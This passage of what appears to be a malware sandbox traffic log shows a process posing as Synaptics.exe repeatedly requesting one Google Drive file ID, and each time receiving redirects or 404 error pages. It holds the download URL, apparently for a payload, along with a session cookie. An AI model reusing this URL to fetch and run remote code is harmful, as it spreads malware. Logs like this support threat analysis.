                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              69192.168.2.749969142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:07 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:08 UTC1243INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC7GVtHhSxq5SMMMO-1cJ72ZKbCrCK1u1eDY5qY9pzk4q5Noi0wL_8VjY6-uzRUBo8B9
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:08 GMT
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-Boaj8ctGenao6Vnr65Ygqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:08 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                              2025-01-02 19:29:08 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 74 57 52 68 47 38 4a 36 79 41 36 33 38 47 6e 68 42 42 37 46 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                              Data Ascii: t Found)!!1</title><style nonce="QtWRhG8J6yA638GnhBB7Fg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                              2025-01-02 19:29:08 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              70192.168.2.749971142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:07 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:08 UTC1243INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC4ooxedmOwarrBlY25meNQxUNV14JlLQws75zMRiJ-XR1q1a1ALJVIv4iY_W1nD9Eo_
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:08 GMT
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-jc1K7EDbyF-CMTl1UuO1AQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:08 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                              2025-01-02 19:29:08 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 32 73 33 79 6f 54 48 32 55 77 6e 54 50 33 79 71 43 45 4c 34 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                              Data Ascii: t Found)!!1</title><style nonce="L2s3yoTH2UwnTP3yqCEL4A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                              2025-01-02 19:29:08 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              71192.168.2.749972216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:07 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:08 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:08 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-f4GRiUhH4Y3f4TAL4k5_Eg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              72192.168.2.749981216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:08 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:09 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:09 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-waWiwF12yP5l91Jcpo-pZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              73192.168.2.749983142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:08 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:09 UTC1243INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC5XfE6c6FWbYbcaYsE8CII7WTQSZH2UxQzlvQ_tXptvVMj6gezsk38K5D1lgTYuwnr5
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:09 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-pW_mcY9mSJ_58K7k28Cvnw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:09 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                              2025-01-02 19:29:09 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 57 48 73 42 58 30 72 69 4a 46 66 71 4e 38 70 6a 66 51 41 72 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                              Data Ascii: t Found)!!1</title><style nonce="JWHsBX0riJFfqN8pjfQArg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                              2025-01-02 19:29:09 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              74192.168.2.749984216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:09 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:09 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:09 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-VtsRT9eiB6ONrKuIGUDj5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              75192.168.2.749985142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:09 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:09 UTC1243INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC4l_FiJWpXy3qHDpBtZAln25MYIPR2cz1tydI6O220s7gBclzHO2lSwgoFyOkgci7w1
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:09 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-lPIFVudLxMtgRIY_5GGbvw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:09 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
